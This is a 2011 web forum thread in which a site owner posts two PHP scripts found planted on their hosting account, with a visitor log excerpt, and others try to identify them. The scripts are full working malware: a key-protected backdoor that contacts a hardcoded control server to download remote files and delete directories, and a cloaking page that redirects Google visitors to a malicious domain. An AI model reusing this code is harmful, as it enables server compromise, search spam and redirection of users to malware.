Hacked? - Found some strange directories in my root

Tricky · 08-02-2011, 17:12

I have a hosted account for my domain and recently found a directory under the /public_html/ with random letters for the directory name and a couple of scripts within including a file that is building up logging information.

Directory perms were 777 (I did not create it!)

I included the content of the scripts below - Anyone know what it is, where it came from or what it is used to do??

INDEX.PHP includes:

PHP Code:


			
<?php

$k='6fb8e25b609624dc10a68641e846102a';if ($k != md5($_GET['k'])) { echo'nk'; exit; }

$ctl="188.124.3.195";$ctlp="/ctl.php";$c=$_GET[c];

if ($c=='init'){doinit();}if ($c=='check'){docheck();}if ($c=='get'){doget();}if ($c=='del'){dodel();}

function dodel() {

        if ($_GET[all]==1) {

                $d="."; $dh=opendir($d);

                while (($f=readdir($dh)) != false) { $c++; if ($f!="."&&$f!=".."){unlink($f);} } closedir($dh);

                $d="cache"; $dh=opendir($d);

                while (($f=readdir($dh)) != false) { $c++; if ($f!="."&&$f!=".."){unlink("cache/$f");} } closedir($dh);       rmdir("cache"); echo $c;

        } else { $fd=fopen("index.html","w");fclose($fd);unlink(basename($_SERVER[PHP_SELF]));}

}

function doget() {

        global $ctlp, $ctl;     $a = $_GET[a];

        $lname = basename($a);

        $b=dirname($ctlp);

        echo "$b$a";

if (eregi("php$",$lname)){$a1 = str_replace("php", "txt", $a);}

else{$a1=$a;}

        $fd=fopen($lname,"w");

        $d = g($ctl,80,"$b$a1");

        fwrite($fd,$d); fclose($fd);

        echo "'".strlen($d)."'";

}

function doinit() {

        global$ctl,$ctlp;$b=mkdir("cache");if(!$b){echo '0';exit;}echo g($ctl,80,$ctlp."?c=init&me=".base64_encode(getme()));

}

function docheck(){

        echo getme();if (fopen("tmp","w")) {echo";1";}else{echo";0";}

}

function getme() { return "http://".$_SERVER[HTTP_HOST]."".$_SERVER[PHP_SELF]; }

function g($server, $port, $file) {

    $socket=fsockopen($server,$port,$errno,$errstr,60) or die("Can't open socket");

    $refer = $_SERVER['HTTP_HOST']?$_SERVER['HTTP_HOST']:$server;

    fputs($socket, "GET $file HTTP/1.0\r\n");

    fputs($socket, "Host: $server\r\n\r\n");

    $dat = '';

    do {$dat .= fgets ($socket, 1024);} while (strpos($dat,"\r\n\r\n") === false);

    $dat = '';

    while (!feof($socket)) {$dat .= fread($socket,8192);}

    fclose($socket);

    return $dat;

}

?>

XTYB.PHP includes:

PHP Code:


			
<?php

dolog();

error_reporting(0);

$nr=rand(9,11);

list($arg,$val)=@each($_GET);

$t=base64_decode("PEhUTUw+DQogICAgPEhFQUQ+DQogICAgICAgIDxUSVRMRT4jdGl0bGUjPC9USVRMRT4gICAgIA0KICAgICAgICA8c3R5bGU+DQpIMw0Kew0KCW1hcmdpbi1sZWZ0OjEuNThlbTsNCn0NCkg0DQp7IA0KCW1hcmdpbi1sZWZ0OjMuMTZlbTsNCn0NCkg1DQp7DQoJbWFyZ2luLWxlZnQ6NC43NGVtOw0KfQ0KLmhvdXNlYnV0dG9uIHsNCglmb250LXdlaWdodDogYm9sZDsNCgl0ZXh0LWFsaWduOiBjZW50ZXI7DQoJbWFyZ2luLWJvdHRvbTogMnB4Ow0KCW1hcmdpbi10b3A6IDJweDsNCgl3aWR0aDphdXRvOw0KfQ0KPC9zdHlsZT4NCiAgICA8L0hFQUQ+DQo8Qk9EWT4NCjxESVYgSUQ9Im5hdmlnYXRvciI+DQoJPFRBQkxFIElEPSJUYWJsZTEiPg0KDQoJCTxUUj4NCgkJCTxURD4gLyA8L1REPg0KCQk8L1RSPg0KDQoJPC9UQUJMRT4NCjwvRElWPg0KDQo8UD4NCg0KI2NvbnRlbnQjDQoNCg0KPC9CT0RZPg0KPC9IVE1MPg0K");

$g = checkg($_SERVER[REMOTE_ADDR]);

if (!$g) {if(eregi("google",$_SERVER[HTTP_REFERER])){

$self=$_SERVER[HTTP_HOST].$_SERVER[REQUEST_URI];

$goto='http://longsignups.net/in.cgi?7&ref='.urlencode($_SERVER[HTTP_REFERER])."&page=".urlencode($self);

header("Location: $goto");exit;}}

$q = str_replace("-", " ", urldecode($_GET[$arg]));

$c=1;

$kws = @file('kw.txt');foreach($kws as $k) { if ($c==$id) { $q = trim($k); } $tmp[]=trim($k);  } $kws = $tmp;

if (!in_array($q,$kws)){echo '404';exit;}

shuffle($kws);$rl = array_splice($kws,0,$nr);

foreach($rl as $r) { $rrl[] = "<a href=\"?$arg=".urlencode(str_replace(" ", "-", $r))."\">$r</a>"; }

$h=md5($q); if(file_exists("cache/$h")){echo join('',file("cache/$h"));exit;}

$c=gets2($q);

$t=str_replace("#title#",ucwords($q),$t);

$t=str_replace("#kw#",$q,$t);

$cont = array_merge($c, $rrl);

//$cont = $c;

shuffle($cont);

$t=str_replace("#content#",join(' ',$cont),$t);

$t=str_replace("#relink#",join(' ', ''),$t);

$t = preg_replace_callback("/#rnum#/",create_function('$matches','return gp();'), $t);

$f=@fopen("cache/$h","w");fwrite($f,$t);fclose($f);

echo $t;exit;

function dolog() {

    $str = "$_SERVER[REMOTE_ADDR] -- ".date("Y-m-d H:i:s")." -- $_SERVER[SERVER_NAME] -- $_SERVER[REQUEST_URI] -- $_SERVER[HTTP_REFERER] -- $_SERVER[HTTP_USER_AGENT]\n"; $lp = "evekwalicu.txt"; $fd = fopen($lp, "a");fwrite($fd, $str); fclose($fd);

}

function gets2($kw) {

    $sc = 40;

    $kw =trim($kw);

    $base = "/WebSearchService/rss/webSearch.xml?appid=yahoosearchwebrss&results=$sc&query=".urlencode($kw)."&adult_ok=1";

    $req = $base;

    $s = @fsockopen("api.search.yahoo.com", 80, $_en, $_er, 10);

    $rstr = "GET $req HTTP/1.0\r\n";

    $rstr .= "Host: api.search.yahoo.com\r\n";

    $rstr .= "\r\n";

    @fwrite($s,$rstr);

    $dat='';

    do {$dat .= fgets ($s);} while (strpos($dat,"\r\n\r\n") === false);

    $dat='';

    while (!feof($s)) {$dat .= fread($s,8192);}



    $c = $dat;

    @fclose($s);

    $r = preg_match_all("/<item>(.+?)<\/item>/", $c, $na);

    if ($r < 3) { return 0; }

    $ret = array();

    for($i=1;$i<sizeof($na[1]);$i++) {

        $tmp = $na[1][$i];

        @eregi('<title>(.+)</title>', $tmp, $na2);

        $title = $na2[1];

        @eregi('<description>(.+)</description>', $tmp, $na2);

        $description = $na2[1];

        $description = str_replace("...", ".", $description);

        @eregi('<link>(.+)</link>', $tmp, $na2);

        $link = $na2[1];

        //$ret[] = array($link, $title, $description);

        //if ($i==1) {

            $ret[] = "\n\n<p><a href=\"$link\">$title</a> $description";

        //} else {

         //   $ret[] = " <br>$title $description ";

        //}

    }

    $ret[] = "<P>";

    $ret[] = "<P>";

    $ret[] = "<P>";

    shuffle($ret); return $ret;

}

function checkg($ip) {

    $nfilter = split("\n", "72.14.192.0/18

74.125.0.0/16

64.233.160.0/19

66.249.64.0/19");

    foreach ($nfilter as $f) {

        if (ip_in_range($ip, $f)) { return 1; }

    } return 0;

}

Function decbin32 ($dec) { return str_pad(decbin($dec), 32, '0', STR_PAD_LEFT); }

Function ip_in_range($ip, $range) {

  if (strpos($range, '/') !== false) {

    list($range, $netmask) = explode('/', $range, 2);

    if (strpos($netmask, '.') !== false) {

      $netmask = str_replace('*', '0', $netmask);

      $netmask_dec = ip2long($netmask);

      return ( (ip2long($ip) & $netmask_dec) == (ip2long($range) & $netmask_dec) );

    } else {

      $x = explode('.', $range);

      while(count($x)<4) $x[] = '0';

      list($a,$b,$c,$d) = $x;

      $range = sprintf("%u.%u.%u.%u", empty($a)?'0':$a, empty($b)?'0':$b,empty($c)?'0':$c,empty($d)?'0':$d);

      $range_dec = ip2long($range);

      $ip_dec = ip2long($ip);

      $broadcast_dec = bindec(substr(decbin32($range_dec), 0, $netmask)

                            . str_pad('', 32-$netmask, '1'));

      $wildcard_dec = pow(2, (32-$netmask)) - 1;

      $broadcast_dec = $range_dec | $wildcard_dec;

      return (($ip_dec & $broadcast_dec) == $ip_dec);

    }

  } else {

    if (strpos($range, '*') !==false) { // a.b.*.* format

      $lower = str_replace('*', '0', $range);

      $upper = str_replace('*', '255', $range);

      $range = "$lower-$upper";

    }

    if (strpos($range, '-')!==false) { // A-B format

      list($lower, $upper) = explode('-', $range, 2);

      $lower_dec = ip2long($lower);

      $upper_dec = ip2long($upper);

      $ip_dec = ip2long($ip);

      return ( ($ip_dec>=$lower_dec) && ($ip_dec<=$upper_dec) );

    }

    return false;

  }

  $ip_dec = ip2long($ip);

  return (($ip_dec & $netmask_dec) == $ip_dec);

}

function gp ($length = 4)

{

  $password = "";

  $possible = "abcdfghjkmnpqrstvwxyz";

   $i = 0;

    while ($i < $length) {

    $char = substr($possible, mt_rand(0, strlen($possible)-1), 1);

    if (!strstr($password, $char)) {

      $password .= $char;

      $i++;

    }

  }

  return $password;

}

?>

Stuart · 08-02-2011, 17:47

Not entirely sure what the two PHP scripts are doing, but it looks like an attempt at a Phishing site.

Tricky · 08-02-2011, 17:59

This is what it created in EVEKWALICU.TXT

PHP Code:


			
66.160.206.167 -- 2010-03-27 13:53:52 -- mydomain.co.uk -- /kxqsyn/xtyb.php?jsya=when-to-reformat-hard-drive --  -- 

66.160.206.186 -- 2010-03-27 13:56:20 -- mydomain.co.uk -- /kxqsyn/xtyb.php?jsya=melbourne-fl-performance&quot;&gt; --  -- 

66.160.206.186 -- 2010-03-27 13:57:34 -- mydomain.co.uk -- /kxqsyn/xtyb.php?jsya=melbourne-fl-performance --  -- 

202.69.237.143 -- 2010-03-27 13:57:36 -- mydomain.co.uk -- /kxqsyn/xtyb.php?jsya=form-af-1540 --  -- B-Wiki/20050210

66.160.206.186 -- 2010-03-27 13:59:09 -- mydomain.co.uk -- /kxqsyn/xtyb.php?jsya=customer-survey-form-for-email-retail --  -- 

66.160.206.167 -- 2010-03-27 14:02:16 -- mydomain.co.uk -- /kxqsyn/xtyb.php?jsya=georgia-mortgage-form-free&quot;&gt; --  -- 

66.160.206.167 -- 2010-03-27 14:03:04 -- mydomain.co.uk -- /kxqsyn/xtyb.php?jsya=salaries-in-information-sciences --  -- 

72.44.48.77 -- 2010-03-27 14:06:55 -- mydomain.co.uk -- /kxqsyn/xtyb.php?jsya=salaries-in-information-sciences --  -- Mozilla/5.0 (compatible; spbot/2.0.2; +http://www.seoprofiler.com/bot/ )

66.160.206.186 -- 2010-03-27 14:10:05 -- mydomain.co.uk -- /kxqsyn/xtyb.php?jsya=nfl-2006-nbc-pink-performed&quot;&gt; --  -- 

66.160.206.186 -- 2010-03-27 14:10:14 -- mydomain.co.uk -- /kxqsyn/xtyb.php?jsya=nfl-2006-nbc-pink-performed&quot;&gt; --  -- 

66.160.206.186 -- 2010-03-27 14:10:18 -- mydomain.co.uk -- /kxqsyn/xtyb.php?jsya=nfl-2006-nbc-pink-performed&quot;&gt; --  -- 



95.108.249.29 -- 2011-02-08 13:10:25 -- mydomain.co.uk -- /kxqsyn/xtyb.php?jsya=how-do-they-perform-an-emg --  -- Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)

124.115.0.169 -- 2011-02-08 13:13:52 -- mydomain.co.uk -- /kxqsyn/xtyb.php?jsya=belly-button-information-piercing --  -- Sosospider+(+http://help.soso.com/webspider.htm)

91.201.66.6 -- 2011-02-08 13:19:00 -- mydomain.co.uk -- /kxqsyn/xtyb.php?jsya=standing-order-form-letting --  -- Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)

91.201.66.6 -- 2011-02-08 13:19:00 -- mydomain.co.uk -- /kxqsyn/xtyb.php?jsya=registration-information-ip -- http://mydomain.co.uk/kxqsyn/xtyb.php?jsya=standing-order-form-letting -- Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)

95.108.249.29 -- 2011-02-08 13:38:02 -- mydomain.co.uk -- /kxqsyn/xtyb.php?jsya=how-to-perform-dent-repair --  -- Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)

119.235.237.16 -- 2011-02-08 13:59:03 -- mydomain.co.uk -- /kxqsyn/xtyb.php?eq;rental-move-out-form&jsya --  -- Yeti/1.0 (NHN Corp.; http://help.naver.com/robots/)

119.235.237.85 -- 2011-02-08 14:01:23 -- mydomain.co.uk -- /kxqsyn/xtyb.php?jsya=american-federation-immigration-reform --  -- Yeti/1.0 (NHN Corp.; http://help.naver.com/robots/)

94.213.156.83 -- 2011-02-08 14:02:10 -- mydomain.co.uk -- /kxqsyn/xtyb.php?jsya=famous-violin-performers --  -- Mozilla/4.0 (compatible; ICS)

207.46.13.88 -- 2011-02-08 14:02:29 -- mydomain.co.uk -- /kxqsyn/xtyb.php?jsya=many-stones-can-form-an-arch --  -- Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)

95.108.249.29 -- 2011-02-08 14:07:31 -- mydomain.co.uk -- /kxqsyn/xtyb.php?jsya=international-pulp-market-information --  -- Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)

180.171.82.63 -- 2011-02-08 14:09:26 -- mydomain.co.uk -- /kxqsyn/xtyb.php?jsya=the-history-of-school-uniforms -- http://www.baidu.com/s?bs=%D3%A2%D3%EF%B8%A8%B5%BC%B1%A8%C9%CF%BA%A3%B0%CB%C4%EA%BC%B6%BA%AE%BC%D9%CE%C4%D5%C2&f=8&wd=the+history+of+the+school+uniforms -- Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; QQDownload 661; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)

Start and end of file included as there are approx 30 hits an hour! this file is a few mb in size.

Matth · 09-02-2011, 23:17

http://forum.hosts-file.net/viewtopic.php?f=70&t=1841
The occurrence of "longsignups.net" is not good!
Malware related!

dragon · 27-02-2011, 19:46

Don't know enough php to understand fully what it's upto although I think it's doing some kind of search/replace possibly injecting it's own code into other php files in the directory?

It also looks to be calling home to either feedback data to it's authors or to receive commands.

If I see one of my friends online who knows PHP i'll ask them about it.

Edit:

My friend replied with "Looks like the cracker is using the site for a link farm (to generate SEO). It also calls Yahoo's search API."

Interesting...